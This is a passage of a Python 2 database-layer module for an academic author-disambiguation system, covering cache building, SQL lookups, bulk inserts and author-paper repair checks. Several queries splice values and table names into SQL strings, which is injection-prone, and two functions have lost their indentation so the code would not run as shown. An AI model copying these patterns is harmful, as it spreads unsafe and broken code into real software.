    assert len(name) == 1, "A bibref must have exactly one name (%s)" % str(ref)
    return name[0][0]
def get_deleted_papers():
    '''
    Gets all deleted papers (records whose 980__a collection tag is
    'DELETED').

    @return: paper identifiers
    @rtype: tuple ((int),)
    '''
    return run_sql("""select o.id_bibrec
                      from bibrec_bib98x o, (select i.id as iid
                                             from bib98x i
                                             where value = 'DELETED'
                                             and tag like '980__a') as dummy
                      where o.id_bibxxx = dummy.iid""")
def get_inverted_lists(qgrams):
    '''
    Gets the inverted lists for the specified qgrams.

    @param qgrams: contiguous sequences of q chars
    @type qgrams: list [str,]
    @return: inverted lists and their cardinality
    @rtype: tuple ((bytes, int),)
    '''
    return run_sql("""select inverted_list, list_cardinality
                      from aidINVERTEDLISTS
                      where qgram in %s"""
                   % _get_sqlstr_from_set(qgrams, f=lambda x: "'%s'" % x))
def populate_partial_marc_caches(selected_bibrecs=None, verbose=True, create_inverted_dicts=False):
    '''
    Populates the module-global marc caches (MARC_100_700_CACHE) with the
    bib10x/bib70x tables and their record mappings.

    @param selected_bibrecs: record ids to cache; None caches every record
    @param verbose: unused here -- kept for interface compatibility
    @param create_inverted_dicts: also build the value->id inverted dicts
        and the bibref-id -> record-id lookup tables
    '''
    global MARC_100_700_CACHE

    def br_dictionarize(maptable, md):
        # Groups (id_bibrec, id_bibxxx, field_number) rows by record and
        # stores both directions of the mapping per record:
        #   'id': bibxxx id -> [field numbers]
        #   'fn': field number -> [bibxxx ids]
        # GC is disabled while building the many short-lived dicts for speed.
        gc.disable()
        maxiters = len(set(map(itemgetter(0), maptable)))
        for i, v in enumerate(groupby(maptable, itemgetter(0))):
            if i % 10000 == 0:
                logger.update_status(float(i) / maxiters, 'br_dictionarizing...')
            idx = defaultdict(list)
            fn = defaultdict(list)
            for _, k, z in v[1]:
                idx[k].append(z)
                fn[z].append(k)
            md[v[0]] = {'id': dict(idx), 'fn': dict(fn)}
        logger.update_status_final('br_dictionarizing done')
        gc.enable()
        return md

    def bib_dictionarize_in_batches(bibtable, bd):
        # Merge (id, (tag, value)) entries into an existing dict.
        bd.update(((i[0], (i[1], i[2])) for i in bibtable))
        return bd

    def bib_dictionarize(bibtable):
        # Build a fresh {id: (tag, value)} dict.
        return dict((i[0], (i[1], i[2])) for i in bibtable)

    sl = 500  # records per SQL 'in (...)' bunch
    logger.update_status(.0, 'Populating cache, 10x')
    if selected_bibrecs is None:
        bibrecs = list(set(x[0] for x in run_sql("select distinct(id_bibrec) from bibrec_bib10x")))
    else:
        bibrecs = selected_bibrecs
    # If there is nothing to cache, stop here
    if not bibrecs:
        return
    if MARC_100_700_CACHE:
        bibrecs = set(bibrecs) - MARC_100_700_CACHE['records']
        # we add to the cache only the missing records. If nothing is missing, go away.
        if not bibrecs:
            return
        MARC_100_700_CACHE['records'] |= set(bibrecs)
    else:
        MARC_100_700_CACHE = dict()
        MARC_100_700_CACHE['records'] = set(bibrecs)
    bibrecs = list(bibrecs)
    # bibrecs.sort()
    bibrecs = [bibrecs[x:x + sl] for x in range(0, len(bibrecs), sl)]
    if 'brb100' in MARC_100_700_CACHE:
        brd_b10x = MARC_100_700_CACHE['brb100']
    else:
        brd_b10x = dict()
    for i, bunch in enumerate(bibrecs):
        logger.update_status(float(i) / len(bibrecs), '10x population bunching...')
        bibrec_bib10x = run_sql("select id_bibrec, id_bibxxx, field_number"
                                " from bibrec_bib10x where id_bibrec in %s "
                                % _get_sqlstr_from_set(bunch))
        # groupby in br_dictionarize needs the rows sorted by record id
        bibrec_bib10x = sorted(bibrec_bib10x, key=lambda x: x[0])
        brd_b10x = br_dictionarize(bibrec_bib10x, brd_b10x)
        del bibrec_bib10x
    logger.update_status(.25, 'Populating cache, 70x')
    if not selected_bibrecs:
        bibrecs = list(set(x[0] for x in run_sql("select distinct(id_bibrec) from bibrec_bib70x")))
        bibrecs = [bibrecs[x:x + sl] for x in range(0, len(bibrecs), sl)]
    if 'brb700' in MARC_100_700_CACHE:
        brd_b70x = MARC_100_700_CACHE['brb700']
    else:
        brd_b70x = dict()
    for i, bunch in enumerate(bibrecs):
        logger.update_status(float(i) / len(bibrecs), '70x population bunching...')
        bibrec_bib70x = run_sql("select id_bibrec, id_bibxxx, field_number"
                                " from bibrec_bib70x where id_bibrec in %s "
                                % _get_sqlstr_from_set(bunch))
        bibrec_bib70x = sorted(bibrec_bib70x, key=lambda x: x[0])
        brd_b70x = br_dictionarize(bibrec_bib70x, brd_b70x)
        del bibrec_bib70x
    logger.update_status(.5, 'Populating get_grouped_records_table_cache')
    if 'b100' in MARC_100_700_CACHE:
        bibd_10x = MARC_100_700_CACHE['b100']
    else:
        bibd_10x = dict()
    logger.update_status(.625, 'Populating get_grouped_records_table_cache')
    if selected_bibrecs:
        for i, bunch in enumerate(bibrecs):
            bib10x = (run_sql("select id, tag, value"
                              " from bib10x, bibrec_bib10x where id=id_bibxxx "
                              " and id_bibrec in %s" % _get_sqlstr_from_set(bunch)))
            bibd_10x = bib_dictionarize_in_batches(bib10x, bibd_10x)
    else:
        bib10x = (run_sql("select id, tag, value"
                          " from bib10x"))
        bibd_10x = bib_dictionarize(bib10x)
    del bib10x
    if 'b700' in MARC_100_700_CACHE:
        bibd_70x = MARC_100_700_CACHE['b700']
    else:
        bibd_70x = dict()
    logger.update_status(.75, 'Populating get_grouped_records_table_cache')
    if selected_bibrecs:
        for i, bunch in enumerate(bibrecs):
            bib70x = (run_sql("select id, tag, value"
                              " from bib70x, bibrec_bib70x where id=id_bibxxx"
                              " and id_bibrec in %s" % _get_sqlstr_from_set(bunch)))
            bibd_70x = bib_dictionarize_in_batches(bib70x, bibd_70x)
    else:
        bib70x = (run_sql("select id, tag, value"
                          " from bib70x"))
        bibd_70x = bib_dictionarize(bib70x)
    del bib70x
    logger.update_status_final('Finished populating get_grouped_records_table_cache')
    MARC_100_700_CACHE['brb100'] = brd_b10x
    MARC_100_700_CACHE['brb700'] = brd_b70x
    MARC_100_700_CACHE['b100'] = bibd_10x
    MARC_100_700_CACHE['b700'] = bibd_70x
    if (create_inverted_dicts or 'inverted_b100' in MARC_100_700_CACHE):
        # value -> id inverted dicts (presumably used by the search engine)
        #MARC_100_700_CACHE['reversed_b100'] = dict((v,k) for k,v in MARC_100_700_CACHE['b100'].items())
        MARC_100_700_CACHE['inverted_b100'] = dict(izip(MARC_100_700_CACHE['b100'].itervalues(), MARC_100_700_CACHE['b100'].iterkeys()))
        #MARC_100_700_CACHE['reversed_b700'] = dict((v,k) for k,v in MARC_100_700_CACHE['b700'].items())
        MARC_100_700_CACHE['inverted_b700'] = dict(izip(MARC_100_700_CACHE['b700'].itervalues(), MARC_100_700_CACHE['b700'].iterkeys()))

        def create_lookup_dict(brb):
            # bibxxx id -> set of record ids referencing it
            b = defaultdict(set)
            for k, v in brb.iteritems():
                for identifier in v['id'].iterkeys():
                    b[identifier].add(k)
            return dict(b)
        # NOTE(review): indentation reconstructed -- assuming the lookup
        # tables are built only together with the inverted dicts; confirm.
        MARC_100_700_CACHE['b100_id_recid_lookup_table'] = create_lookup_dict(MARC_100_700_CACHE['brb100'])
        MARC_100_700_CACHE['b700_id_recid_lookup_table'] = create_lookup_dict(MARC_100_700_CACHE['brb700'])
def search_engine_is_operating(): ### check_search_engine_status
    '''
    Examines if the bibauthorid search engine is operating.

    The engine is considered operational when both marker rows exist:
    flag=-1 in aidDENSEINDEX and the all-'!' qgram in aidINVERTEDLISTS
    (presumably sentinels written when each index build completes -- confirm).

    @return: bibauthorid search engine is operating
    @rtype: bool
    '''
    dense_index_exists = bool(run_sql("""select *
                                         from aidDENSEINDEX
                                         where flag=%s""",
                                      (-1,)))
    inverted_lists_exists = bool(run_sql("""select *
                                            from aidINVERTEDLISTS
                                            where qgram=%s""",
                                         ('!' * bconfig.QGRAM_LEN,)))
    # idiom: return the conjunction directly instead of if/True/False
    return dense_index_exists and inverted_lists_exists
def _truncate_table(table_name):
    '''
    Truncates the specified table.

    @param table_name: name of the table to truncate; interpolated into the
        statement, so only trusted internal callers may supply it
    @type table_name: str
    '''
    run_sql('truncate %s' % table_name)
def flush_data_to_db(table_name, column_names, args): # flush_data
    '''
    Flushes the given data in the specified table with the specified columns.

    @param table_name: name of the table
    @type table_name: str
    @param column_names: names of the columns
    @type column_names: list [str,]
    @param args: data to flush in the database (flat list, row after row)
    @type args: list
    '''
    column_num = len(column_names)
    assert len(
        args) % column_num == 0, 'Trying to flush data in table %s. Wrong number of arguments passed.' % table_name

    # one "(%s, ..., %s)" placeholder group per row; the actual values are
    # passed to run_sql as parameters
    values_sqlstr = "(%s)" % ", ".join(repeat("%s", column_num))
    # NOTE: '/' is integer (floor) division under Python 2, which this
    # codebase targets
    multiple_values_sqlstr = ", ".join(repeat(values_sqlstr, len(args) / column_num))
    insert_query = 'insert into %s (%s) values %s' % (table_name, ", ".join(column_names), multiple_values_sqlstr)
    run_sql(insert_query, args)
#
#
# no table ###
#
#
def create_new_author_by_signature(sig, name=None, m_name=None): # new_person_from_signature
    '''
    Creates a new author and associates him with the given signature.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)
    @param name: author name
    @type name: str
    @param m_name: presumably the matchable/normalized form of the name,
        forwarded verbatim to add_signature -- TODO confirm
    @type m_name: str

    @return: identifier of the newly created author
    @rtype: int
    '''
    pid = get_free_author_id()
    add_signature(sig, name, pid, m_name=m_name)
    return pid
def check_author_paper_associations(output_file=None): # check_personid_papers
    '''
    It examines if there are records in aidPERSONIDPAPERS table which are in an
    impaired state. If 'output_file' is specified it writes the output in that
    file, otherwise in stdout.

    @param output_file: file to write output
    @type output_file: str

    @return: True when no damaged records are found (note: the original
        docstring claimed the opposite sense; the code returns not-any)
    @rtype: bool
    '''
    fp = None
    if output_file:
        fp = open(output_file, "w")
        printer = lambda x: fp.write(x + '\n')
    else:
        printer = logger.log

    checkers = (wrong_names_exist,
                duplicated_conirmed_papers_exist,
                duplicated_confirmed_signatures_exist,
                impaired_rejections_exist,
                impaired_canonical_names_exist,
                empty_authors_exist
                # check_claim_inspireid_contradiction
                )

    try:
        # avoid writing f(a) or g(a), because one of the calls might be optimized
        return not any([check(printer) for check in checkers])
    finally:
        # fix: the output file was previously opened but never closed
        if fp is not None:
            fp.close()
def repair_author_paper_associations(output_file=None): # repair_personid
    '''
    It examines if there are records in aidPERSONIDPAPERS table which are in an
    impaired state and repairs them. If 'output_file' is specified it writes
    the output in that file, otherwise in stdout.

    @param output_file: file to write output
    @type output_file: str

    @return: True when the final check after repairing finds no damaged
        records (note: the original docstring claimed the opposite sense)
    @rtype: bool
    '''
    fp = None
    if output_file:
        fp = open(output_file, "w")
        printer = lambda x: fp.write(x + '\n')
    else:
        printer = logger.log

    checkers = (wrong_names_exist,
                duplicated_conirmed_papers_exist,
                duplicated_confirmed_signatures_exist,
                impaired_rejections_exist,
                impaired_canonical_names_exist,
                empty_authors_exist
                # check_claim_inspireid_contradiction
                )

    try:
        first_check = [check(printer) for check in checkers]
        repair_pass = [check(printer, repair=True) for check in checkers]
        last_check = [check(printer) for check in checkers]

        if any(first_check):
            # if something was broken, the repair pass must have acted and
            # the final pass must come out clean
            assert any(repair_pass)
            assert not any(last_check)
        return not any(last_check)
    finally:
        # fix: the output file was previously opened but never closed
        if fp is not None:
            fp.close()
def get_author_refs_of_paper(rec): # get_authors_from_paper
    '''
    Gets all author refs for the specified paper.

    Prefers the in-memory marc caches when they are loaded, otherwise
    falls back to a direct database lookup.

    @param rec: paper identifier
    @type rec: int

    @return: author refs
    @rtype: list [(str),]
    '''
    if not MARC_100_700_CACHE:
        return _get_author_refs_from_db_of_paper(rec)
    return _get_author_refs_from_marc_caches_of_paper(rec)
def _get_author_refs_from_marc_caches_of_paper(rec): # _get_authors_from_paper_from_cache
    '''
    Gets all author refs for the specified paper (from marc caches).
    If author refs are not found in marc caches, the database is queried.

    @param rec: paper identifier
    @type rec: int

    @return: author refs as 1-tuples, mirroring database result rows
    @rtype: tuple
    '''
    try:
        ids = MARC_100_700_CACHE['brb100'][rec]['id'].keys()
        # keep only the bibxxx entries carrying a '100__a' (author name) tag
        refs = [i for i in ids if '100__a' in MARC_100_700_CACHE['b100'][i][0]]
    except KeyError:
        if rec in MARC_100_700_CACHE['records']:
            # the record is cached but simply has no 100-field entries
            refs = tuple()
        else:
            return _get_author_refs_from_db_of_paper(rec)
    # zip with a single argument wraps every ref in a 1-tuple
    return tuple(zip(refs))
def get_coauthor_refs_of_paper(paper): # get_coauthors_from_paper
    '''
    Gets all coauthor refs for the specified paper.

    Prefers the in-memory marc caches when they are loaded, otherwise
    falls back to a direct database lookup.

    @param paper: paper identifier
    @type paper: int

    @return: coauthor refs
    @rtype: list [(str),]
    '''
    if not MARC_100_700_CACHE:
        return _get_coauthor_refs_from_db_of_paper(paper)
    return _get_coauthor_refs_from_marc_caches_of_paper(paper)
def _get_coauthor_refs_from_marc_caches_of_paper(rec): # _get_coauthors_from_paper_from_cache
    '''
    Gets all coauthor refs for the specified paper (from marc caches).

    @param rec: paper identifier
    @type rec: int

    @return: coauthor refs as 1-tuples, mirroring database result rows
    @rtype: tuple
    '''
    try:
        ids = MARC_100_700_CACHE['brb700'][rec]['id'].keys()
        # keep only the bibxxx entries carrying a '700__a' (coauthor name) tag
        refs = [i for i in ids if '700__a' in MARC_100_700_CACHE['b700'][i][0]]
    except KeyError:
        if rec in MARC_100_700_CACHE['records']:
            # the record is cached but simply has no 700-field entries
            refs = tuple()
        else:
            return _get_coauthor_refs_from_db_of_paper(rec)
    # zip with a single argument wraps every ref in a 1-tuple
    return tuple(zip(refs))
def get_all_bibrefs_of_paper(rec):
    '''
    Gets all author and coauthor refs for the specified paper.

    @param rec: paper identifier
    @type rec: int

    @return: author and coauthor refs [(table, ref),]
    @rtype: list [(int, str),]
    '''
    refs = [(100, row[0]) for row in get_author_refs_of_paper(rec)]
    refs.extend((700, row[0]) for row in get_coauthor_refs_of_paper(rec))
    return refs
def get_all_signatures_of_paper(rec):
    '''
    Gets all existing signatures for the specified paper.

    @param rec: paper identifier
    @type rec: int

    @return: one dict per signature, e.g. {'bibref': '100:123', 'sig': name}
        (the original docstring claimed a {name: bibref} dict, but the code
        builds a list of dicts)
    @rtype: list [dict,]
    '''
    signatures = list()
    refs = get_all_bibrefs_of_paper(rec)
    for table, ref in refs:
        marc_tag = str(table) + '__a'  # name subfield of the 100/700 field
        sig = get_grouped_records((table, ref, rec), marc_tag)[marc_tag][0]
        bibref = str(table) + ':' + str(ref)
        signatures.append({"bibref": bibref, "sig": sig})
    return signatures
def _get_name_by_bibref_from_cache(ref): # _get_name_by_bibrecref_from_cache
    '''
    Finds the author name from cache based on the given bibref.
    Falls back to the database when the bibref is not cached.

    @param ref: bibref (bibref_table, bibref_value)
    @type ref: tuple (int, int)

    @return: name; None when the cached entry exists but has no name tag
    @rtype: str
    '''
    table = "b%s" % ref[0]
    refid = ref[1]
    tag = "%s__a" % ref[0]  # e.g. '100__a' / '700__a'
    name = None
    try:
        if tag in MARC_100_700_CACHE[table][refid][0]:
            name = MARC_100_700_CACHE[table][refid][1]
    except (KeyError):
        name = _get_name_from_db_by_bibref(ref)
    return name
def get_inspire_id_of_signature(sig): # get_inspire_id
    '''
    Gets the external identifier of Inspire system for the given signature.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)

    @return: Inspire external identifier
    @rtype: list [str]
    '''
    table, ref, rec = sig
    # the 'i' subfield (e.g. '100__i'/'700__i') carries the Inspire id
    return get_grouped_records((str(table), ref, rec), str(table) + '__i').values()[0]
def get_orcid_id_of_signature(sig):
    """
    Gets the external identifier of ORCID system for the given signature.
    The fields to check are either '100__j' and '100__k' or '700__j' and '700__k'
    and the prefix is 'ORCID:'

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)

    @return: the ORCID id wrapped in a list, or (implicitly) None when no
        well-formed ORCID value is attached
    @rtype: list [str] or None
    """
    table, ref, rec = sig
    ext_ids_field = (str(table), ref, rec), str(table) + '__j', str(table) + '__k'
    ext_ids = chain(*get_grouped_records(*ext_ids_field).values())
    for ext_id in ext_ids:
        if ext_id.startswith('ORCID:'):
            try:
                # extract the canonical dashed ORCID (last digit may be X)
                return [re.search(r"0000-000\d-\d{4}-\d{3}[\dX]", ext_id).group()]
            except AttributeError:
                # malformed ORCID value: keep scanning the remaining ids
                pass
def get_kaken_id_of_signature(sig):
    """
    Gets the external identifier of KAKEN system for the given signature.
    The field to check is either '100__j' or '700__j'
    and the prefix is 'KAKEN-'

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)

    @return: the KAKEN id wrapped in a list, or (implicitly) None when no
        well-formed KAKEN value is attached
    @rtype: list [str] or None
    """
    table, ref, rec = sig
    ext_ids_field = (str(table), ref, rec), str(table) + '__j'
    ext_ids = get_grouped_records(*ext_ids_field).values()[0]
    for ext_id in ext_ids:
        if ext_id.startswith('KAKEN-'):
            try:
                # KAKEN ids are 8-digit numbers
                return [re.search(r"\d{8}", ext_id).group()]
            except AttributeError:
                # malformed KAKEN value: keep scanning the remaining ids
                pass
def get_author_names_from_db(pid): # get_person_db_names_set
    '''
    Gets the set of names associated to the given author.

    @param pid: author identifier
    @type pid: int

    @return: author names as 1-tuples
    @rtype: list [(str,),]
    '''
    names = get_names_of_author(pid)
    if not names:
        return list()
    # zip(*names)[0] extracts the name column; the outer single-argument
    # zip re-wraps every name in a 1-tuple
    return zip(zip(*names)[0])
def get_all_valid_bibrecs():
    '''
    Gets all valid bibrecs.

    @return: paper identifiers
    @rtype: list [int,]
    '''
    # rg=0 presumably removes the search engine's result-count limit -- confirm
    return perform_request_search(c=bconfig.LIMIT_TO_COLLECTIONS, rg=0)
def get_name_by_bibref(ref): # get_name_by_bibrecref
    '''
    Finds the author name based on the given bibref.

    Dispatches to the cache-backed implementation when the marc caches are
    loaded, otherwise reads from the database.

    @param ref: bibref (bibref_table, bibref_value)
    @type ref: tuple (int, int)

    @return: name
    @rtype: str
    '''
    if not MARC_100_700_CACHE:
        return _get_name_from_db_by_bibref(ref)
    return _get_name_by_bibref_from_cache(ref)
def get_last_rabbit_runtime(): # fetch_bibauthorid_last_update
    '''
    Gets last runtime of rabbit.

    @return: last runtime of rabbit; the earliest representable datetime
        when rabbit never ran
    @rtype: datetime.datetime
    '''
    log = get_user_logs(userinfo='daemon', action='PID_UPDATE', only_most_recent=True)
    try:
        last_update = log[0][2]
    except IndexError:
        # no PID_UPDATE log entry yet: fall back to year 1
        last_update = datetime.datetime(year=1, month=1, day=1)
    return last_update
def get_db_time(): # get_sql_time
    '''
    Gets the time according to the database.

    @return: db time
    @rtype: datetime.datetime
    '''
    return run_sql("select now()")[0][0]
def destroy_partial_marc_caches():
    '''
    Destroys marc caches (resets the module-global MARC_100_700_CACHE,
    letting the garbage collector reclaim the cached tables).
    '''
    global MARC_100_700_CACHE
    MARC_100_700_CACHE = None
def _split_signature_string(sig_str):
'''
Splits a signature from a string form to its parts.
@param sig_str: signature in a string form e.g. '100:7531,9024'
@type sig_str: str
@return: signature (bibref_table, bibref_value, bibrec)
@rtype: tuple (int, int, int)
'''
bibref, rec = sig_str.split(",")
rec = int(rec)
table, ref = bibref.split(":")
ref = int(ref)
return (table, ref, rec)
def _get_sqlstr_from_set(items, f=lambda x: x): # list_2_SQL_str
"""
Creates a string from a set after transforming each item
with a function.
@param items: set of items
@type items: X
@param f: function to be applied to each item
@type f: func (x->str)
@return: "(f(x1), f(x2), ..., f(xn))" where x1,x2,...,xn elements of 'items'
@rtype: str
"""
strs = (str(f(x)) for x in items)
return "(%s)" % ", ".join(strs)
def get_paper_access_right(acc): # resolve_paper_access_right
    '''
    Given an access right key, resolves to the corresponding access right
    value. If asked for a wrong/not present key falls back to the minimum
    permission.

    @param acc: access right key (string) or access right value (number)
    @type acc: str or int

    @return: access right value for a string key, access right key for a
        numeric value
    @rtype: str or int
    '''
    access_dict = {bconfig.CLAIMPAPER_VIEW_PID_UNIVERSE: 0,
                   bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS: 25,
                   bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS: 50}

    if isinstance(acc, str):
        # fix: was a bare 'except:' swallowing everything incl. interrupts;
        # an unknown key simply maps to the minimum permission
        return access_dict.get(acc, 0)

    inverse_dict = dict((v, k) for k, v in access_dict.items())
    lower_accs = [a for a in inverse_dict.keys() if a <= acc]
    if lower_accs:
        return inverse_dict[max(lower_accs)]
    # fix: 'max([])' previously raised ValueError caught by a bare 'except:';
    # a value below every known level falls back to the minimum permission
    return bconfig.CLAIMPAPER_VIEW_PID_UNIVERSE
def get_grouped_records(sig, *args):
    '''
    Gets the records grouped with the given signature carrying one of the
    given tags. Dispatches to the marc-cache implementation when the cache
    is loaded, otherwise reads straight from the database.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)
    @param args: tags
    @type args: tuple (str,)
    '''
    if not MARC_100_700_CACHE:
        return _get_grouped_records_from_db(sig, *args)
    return _get_grouped_records_using_marc_caches(sig, *args)
def _get_grouped_records_using_marc_caches(sig, *args): # _get_grouped_records_using_caches
    '''
    Gets the records from marc caches which are grouped together with the paper
    specified in the given signature and carry a tag from 'args'.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)
    @param args: tags
    @type args: tuple (str,)

    @return: {tag: [extracted_value,]}
    @rtype: dict {str: [str,]}
    '''
    table, ref, rec = sig
    try:
        c = MARC_100_700_CACHE['brb%s' % str(table)][rec]
        fn = c['id'][ref]  # field numbers grouping this bibref on the paper
    except KeyError:
        if rec in MARC_100_700_CACHE['records']:
            # cached record without this bibref: nothing is grouped with it
            return dict()
        else:
            return _get_grouped_records_from_db(sig, *args)
    if not fn: # or len(fn)>1
        # If len(fn) > 1 it's BAD: the same signature is at least twice on the same paper.
        # But after all, that's the mess we find in the database, so let's leave it there.
        return dict((tag, list()) for tag in args)
    # all bibxxx ids sharing a field number with the signature
    ids = set(chain(*(c['fn'][i] for i in fn)))
    tuples = [MARC_100_700_CACHE['b%s' % str(table)][i] for i in ids]
    res = defaultdict(list)
    for t in tuples:
        present = [tag for tag in args if tag in t[0]]
        # assert len(present) <= 1
        if present:
            tag = present[0]
            res[tag].append(t[1])
    # make sure every requested tag appears in the result, even when empty
    for tag in args:
        if tag not in res.keys():
            res[tag] = list()
    return dict(res)
def populate_table(table_name, column_names, values, empty_table_first=True):
    '''
    Populates the specified table which has the specified column names with the
    given list of values. If 'empty_table_first' flag is enabled it truncates
    the table before populating it.

    @param table_name: name of the table to populate
    @type table_name: str
    @param column_names: column names of the table
    @type column_names: list [str,]
    @param values: values to be inserted (flat list, row after row)
    @type values: list
    @param empty_table_first: truncate the table before populating it
    @type empty_table_first: bool
    '''
    values_len = len(values)
    column_num = len(column_names)
    values_tuple_size = list()
    assert values_len % column_num == 0, 'Trying to populate table %s. Wrong number of arguments passed.' % table_name

    for i in range(int(values_len / column_num)):
        # it keeps the size for each tuple of values
        # NOTE(review): the inner comprehension reuses 'i', shadowing the row
        # index; harmless here because the for-loop rebinds 'i' every pass
        # (Python 2 comprehension leakage), but fragile -- worth renaming.
        values_tuple_size.append(sum([len(str(i)) for i in values[i * column_num:i * column_num + column_num]]))

    if empty_table_first:
        _truncate_table(table_name)

    populate_table_with_limit(table_name, column_names, values, values_tuple_size)
def populate_table_with_limit(table_name, column_names, values, values_tuple_size,
                              max_insert_size=CFG_BIBAUTHORID_SEARCH_ENGINE_MAX_DATACHUNK_PER_INSERT_DB_QUERY):
    '''
    Populates the specified table which has the specified column names with the
    given list of values. It limits the datachunk size per single insert query
    according to the given threshold. Bigger threshold means better
    performance. Nevertheless if it is too big there is the risk that the mysql
    connection timeout will run out and connection with the db will be lost.

    @param table_name: name of the table to populate
    @type table_name: str
    @param column_names: column names of the table
    @type column_names: list [str,]
    @param values: values to be inserted (flat list, row after row)
    @type values: list
    @param values_tuple_size: size of each tuple of values
    @type values_tuple_size: list [int,]
    @param max_insert_size: max datachunk size to be inserted to the table per single insert query
    @type max_insert_size: int
    '''
    column_num = len(column_names)
    summ = 0
    start = 0
    for i in range(len(values_tuple_size)):
        if summ + values_tuple_size[i] <= max_insert_size:
            summ += values_tuple_size[i]
            continue
        summ = values_tuple_size[i]
        # NOTE(review): flushing up to (i-1)*column_num keeps row i-1 out of
        # this chunk even though its size was already accumulated in 'summ',
        # and the reset 'summ' does not account for it -- looks like an
        # off-by-one (i*column_num expected); confirm before relying on the
        # chunk-size guarantee.
        flush_data_to_db(table_name, column_names, values[start:(i - 1) * column_num])
        start = (i - 1) * column_num
    # flush whatever is left over
    flush_data_to_db(table_name, column_names, values[start:])
#
#
# other stuff ###
#
#
#
#
# not used functions ###
#
#
def remove_not_claimed_papers_from_author(pid): # del_person_not_manually_claimed_papers
    '''
    Deletes papers which have not been manually claimed or rejected
    from the given author.

    @param pid: author
    @type pid: int
    '''
    # presumably flag 2 = manually claimed, flag -2 = manually rejected
    # (consistent with flag='2' used for claims elsewhere in this module)
    run_sql("""delete from aidPERSONIDPAPERS
               where (flag <> -2 and flag <> 2)
               and personid=%s""", (pid,) )
def remove_all_signatures_from_authors(pids): # remove_personid_papers
    '''
    Deletes all signatures from the given authors.

    @param pids: authors
    @type pids: list [int,]
    '''
    if pids:
        pids_sqlstr = _get_sqlstr_from_set(pids)
        run_sql("""delete from aidPERSONIDPAPERS
                   where personid in %s"""
                % pids_sqlstr)
def get_authors_by_surname(surname, limit_to_recid=False): # find_pids_by_name
    '''
    Gets all authors who carry records with the specified surname.

    @param surname: author surname
    @type surname: str
    @param limit_to_recid: when True only the author identifiers are selected
    @type limit_to_recid: bool

    @return: set((pid, name),) -- or set((pid,),) when 'limit_to_recid' is set
    @rtype: set
    '''
    if not limit_to_recid:
        select_query = "select personid, name "
    else:
        select_query = "select personid "
    # names are matched as 'Surname,<anything>' -- surname before the comma
    return set(run_sql(select_query +
                       """from aidPERSONIDPAPERS
                          where name like %s""",
                       (surname + ',%',)))
# could be useful to optimize rabbit. Still unused and untested, Watch out!
def get_author_to_signatures_mapping(): # get_bibrecref_to_pid_dictuonary
    '''
    Gets a mapping which associates signatures with the set of authors who
    carry a record with that signature.

    @return: mapping
    @rtype: dict {(str, int, int): set(int,)}
    '''
    # could be useful to optimize rabbit. Still unused and untested, Watch out!
    mapping = defaultdict(set)
    rows = _select_from_aidpersonidpapers_where(select=['personid', 'bibref_table', 'bibref_value', 'bibrec'])
    for row in rows:
        mapping[row[1:]].add(row[0])
    return dict(mapping)
def get_author_data_associations_for_author(pid): # get_specific_personid_full_data
    '''
    Gets all author-data associations for the given author.

    @param pid: author identifier
    @type pid: int

    @return: author-data associations ((pid, tag, data, opt1, opt2, opt3),)
    @rtype: tuple ((int, str, str, int, int, str),)
    '''
    return _select_from_aidpersoniddata_where(select=['personid', 'tag', 'data', 'opt1', 'opt2', 'opt3'], pid=pid)
def get_user_id_of_author(pid): # get_uids_by_pids
    '''
    Gets the user identifier for the given author.

    @param pid: author identifier
    @type pid: int

    @return: user identifier (rows of the 'uid' tag data)
    @rtype: tuple ((str),)
    '''
    return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='uid')
def restore_author_paper_associations(): # restore_personids
    '''
    Restores the author-data and author-paper association tables
    (aidPERSONIDDATA, aidPERSONIDPAPERS) from the last saved copy of the
    back-up tables (aidPERSONIDDATA_copy, aidPERSONIDPAPERS_copy).

    Both live tables are truncated first, so any changes made since the
    back-up are lost.
    '''
    _truncate_table('aidPERSONIDDATA')
    run_sql("""insert into `aidPERSONIDDATA`
               select *
               from `aidPERSONIDDATA_copy`""")

    _truncate_table('aidPERSONIDPAPERS')
    run_sql("""insert into `aidPERSONIDPAPERS`
               select *
               from `aidPERSONIDPAPERS_copy`""")
def check_claim_inspireid_contradiction():
    '''
    It examines if the merger introduced any error to the author-paper
    associations (e.g. claimed papers are assigned to a different author,
    loss of signatures, creation of new signatures). It presumes that
    copy_personid was called before the merger.

    NOTE(review): despite the original '@return: bool' annotation, every code
    path falls off the end -- problems are only printed, None is returned.
    '''
    # all bibxxx ids carrying an Inspire id ('100__i') / an author name ('100__a')
    inspire_ids10x = run_sql("""select id
                                from bib10x
                                where tag='100__i'""")
    refs10x = set(i[0] for i in run_sql("""select id
                                           from bib10x
                                           where tag='100__a'"""))
    if inspire_ids10x:
        inspire_ids10x_sqlstr = _get_sqlstr_from_set(inspire_ids10x, lambda x: str(x[0]))
        inspire_ids10x = run_sql("""select id_bibxxx, id_bibrec, field_number
                                    from bibrec_bib10x
                                    where id_bibxxx in %s"""
                                 % inspire_ids10x_sqlstr)
        # pair every inspire-id bibxxx with the name bibrefs sharing its
        # (record, field number) group
        inspire_ids10x = ((row[0], [(ref, rec) for ref, rec in run_sql(
            """select id_bibxxx, id_bibrec
               from bibrec_bib10x
               where id_bibrec='%s'
               and field_number='%s'"""
            % row[1:])
            if ref in refs10x])
            for row in inspire_ids10x)

    # same for the 700 (coauthor) fields
    inspire_ids70x = run_sql("""select id
                                from bib70x
                                where tag='700__i'""")
    refs70x = set(i[0] for i in run_sql("""select id
                                           from bib70x
                                           where tag='700__a'"""))
    if inspire_ids70x:
        inspire_ids70x_sqlstr = _get_sqlstr_from_set(inspire_ids70x, lambda x: str(x[0]))
        inspire_ids70x = run_sql("""select id_bibxxx, id_bibrec, field_number
                                    from bibrec_bib70x
                                    where id_bibxxx in %s"""
                                 % inspire_ids70x_sqlstr)
        inspire_ids70x = ((row[0], [(ref, rec) for ref, rec in run_sql(
            """select id_bibxxx, id_bibrec
               from bibrec_bib70x
               where id_bibrec='%s'
               and field_number='%s'"""
            % (row[1:]))
